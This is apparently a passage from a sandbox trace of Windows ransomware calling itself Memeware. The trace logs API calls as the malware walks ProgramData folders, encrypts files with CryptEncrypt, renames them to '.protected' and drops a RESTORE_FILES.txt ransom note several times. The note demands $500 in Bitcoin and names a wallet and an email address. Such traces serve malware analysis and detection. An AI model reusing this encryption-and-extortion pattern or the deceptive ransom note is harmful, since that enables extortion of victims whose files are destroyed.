(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.509] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned 52 [0066.509] StrStrW (lpFirst="ppcrlui.dll", lpSrch=".txt") returned 0x0 [0066.509] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned 52 [0066.509] StrStrW (lpFirst="ppcrlui.dll", lpSrch=".rar") returned 0x0 [0066.509] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned 52 [0066.509] StrStrW (lpFirst="ppcrlui.dll", lpSrch=".zip") returned 0x0 [0066.509] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.530] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.530] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.531] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.531] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.531] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0066.531] CloseHandle (hObject=0xb4) returned 1 [0066.537] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.protected") returned 62 [0066.537] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.protected" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll.protected")) returned 1 [0066.538] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.538] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.538] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\RESTORE_FILES.txt") returned 58 [0066.538] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\identitycrl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.566] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.566] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.567] lstrlenA (lpString="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") returned 684 [0066.567] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.567] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.568] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.568] CloseHandle (hObject=0xa4) returned 1 [0066.568] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.568] lstrcmpiW (lpString1="Media Player", lpString2="Windows") returned -1 [0066.568] lstrcmpiW (lpString1="Media Player", lpString2="Program Files") returned -1 [0066.568] lstrcmpiW (lpString1="Media Player", lpString2="Program Files (x86)") returned -1 [0066.568] lstrcmpiW (lpString1="Media Player", lpString2="$Recycle.bin") returned 1 [0066.568] lstrcmpiW (lpString1="Media Player", lpString2="System Volume Information") returned -1 [0066.568] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player") returned 41 [0066.568] lstrcmpW (lpString1="Media Player", lpString2=".") returned 1 [0066.568] lstrcmpW (lpString1="Media Player", lpString2="..") returned 1 [0066.568] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*") returned 43 [0066.568] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.568] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.568] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.568] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.569] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.569] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.569] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\.") returned 43 [0066.569] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.569] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 
[0066.569] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.569] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.569] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.569] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.569] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.569] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\..") returned 44 [0066.569] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.569] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.569] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.569] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.569] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\RESTORE_FILES.txt") returned 59 [0066.569] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\media player\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.569] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.569] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.570] lstrlenA (lpString="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") returned 684 [0066.570] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.570] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.570] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.571] CloseHandle (hObject=0xa4) returned 1 [0066.571] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.571] lstrcmpiW (lpString1="MF", lpString2="Windows") returned -1 [0066.571] lstrcmpiW (lpString1="MF", lpString2="Program Files") returned -1 [0066.571] lstrcmpiW (lpString1="MF", lpString2="Program Files (x86)") returned -1 [0066.571] lstrcmpiW (lpString1="MF", lpString2="$Recycle.bin") returned 1 [0066.571] lstrcmpiW (lpString1="MF", lpString2="System Volume Information") returned -1 [0066.571] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF") returned 31 [0066.571] lstrcmpW (lpString1="MF", lpString2=".") returned 1 [0066.571] lstrcmpW (lpString1="MF", lpString2="..") returned 1 [0066.571] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*") returned 33 [0066.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.571] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.571] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.571] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.571] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.572] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.572] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\.") returned 33 [0066.572] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.572] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.572] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.572] lstrcmpiW (lpString1="..", 
lpString2="Program Files") returned -1 [0066.572] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.572] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.572] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.572] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\..") returned 34 [0066.572] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.572] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.572] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.572] lstrcmpiW (lpString1="Active.GRL", lpString2="Windows") returned -1 [0066.572] lstrcmpiW (lpString1="Active.GRL", lpString2="Program Files") returned -1 [0066.572] lstrcmpiW (lpString1="Active.GRL", lpString2="Program Files (x86)") returned -1 [0066.572] lstrcmpiW (lpString1="Active.GRL", lpString2="$Recycle.bin") returned 1 [0066.572] lstrcmpiW (lpString1="Active.GRL", lpString2="System Volume Information") returned -1 [0066.572] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned 42 [0066.572] StrStrIW (lpFirst="Active.GRL", lpSrch=".protected") returned 0x0 [0066.572] lstrcmpW (lpString1="Active.GRL", lpString2="RESTORE_FILES.txt") returned -1 [0066.572] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.572] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.572] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.572] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned 42 [0066.573] StrStrW (lpFirst="Active.GRL", lpSrch=".txt") returned 0x0 [0066.573] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned 42 [0066.573] StrStrW (lpFirst="Active.GRL", lpSrch=".rar") returned 0x0 [0066.573] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned 42 [0066.573] StrStrW (lpFirst="Active.GRL", lpSrch=".zip") returned 0x0 [0066.573] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.592] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.592] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.592] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.592] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.606] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0066.606] CloseHandle (hObject=0xb4) returned 1 [0066.607] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.protected") 
returned 52 [0066.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.protected" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl.protected")) returned 1 [0066.607] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.607] lstrcmpiW (lpString1="Pending.GRL", lpString2="Windows") returned -1 [0066.607] lstrcmpiW (lpString1="Pending.GRL", lpString2="Program Files") returned -1 [0066.607] lstrcmpiW (lpString1="Pending.GRL", lpString2="Program Files (x86)") returned -1 [0066.607] lstrcmpiW (lpString1="Pending.GRL", lpString2="$Recycle.bin") returned 1 [0066.607] lstrcmpiW (lpString1="Pending.GRL", lpString2="System Volume Information") returned -1 [0066.607] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned 43 [0066.607] StrStrIW (lpFirst="Pending.GRL", lpSrch=".protected") returned 0x0 [0066.607] lstrcmpW (lpString1="Pending.GRL", lpString2="RESTORE_FILES.txt") returned -1 [0066.607] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.608] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.608] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.608] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned 43 [0066.608] StrStrW (lpFirst="Pending.GRL", lpSrch=".txt") returned 0x0 
[0066.608] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned 43 [0066.608] StrStrW (lpFirst="Pending.GRL", lpSrch=".rar") returned 0x0 [0066.608] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned 43 [0066.608] StrStrW (lpFirst="Pending.GRL", lpSrch=".zip") returned 0x0 [0066.608] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.623] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.623] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.624] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.624] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.688] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0066.689] CloseHandle (hObject=0xb4) returned 1 [0066.689] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL.protected") returned 53 [0066.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), 
lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL.protected" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl.protected")) returned 1 [0066.690] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.690] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.690] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\RESTORE_FILES.txt") returned 49 [0066.690] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\mf\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.690] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.690] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.691] lstrlenA (lpString="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") returned 684 [0066.691] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.691] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.691] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.691] CloseHandle (hObject=0xa4) returned 1 [0066.691] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.691] lstrcmpiW (lpString1="MSDN", lpString2="Windows") returned -1 [0066.691] lstrcmpiW (lpString1="MSDN", lpString2="Program Files") returned -1 [0066.691] lstrcmpiW (lpString1="MSDN", lpString2="Program Files (x86)") returned -1 [0066.691] lstrcmpiW (lpString1="MSDN", lpString2="$Recycle.bin") returned 1 [0066.691] lstrcmpiW (lpString1="MSDN", lpString2="System Volume Information") returned -1 [0066.691] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN") returned 33 [0066.691] lstrcmpW (lpString1="MSDN", lpString2=".") returned 1 [0066.691] lstrcmpW (lpString1="MSDN", lpString2="..") returned 1 [0066.691] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*") returned 35 [0066.691] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.810] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.810] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.810] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.810] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.810] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.810] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\.") returned 35 [0066.810] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.810] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.810] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.810] 
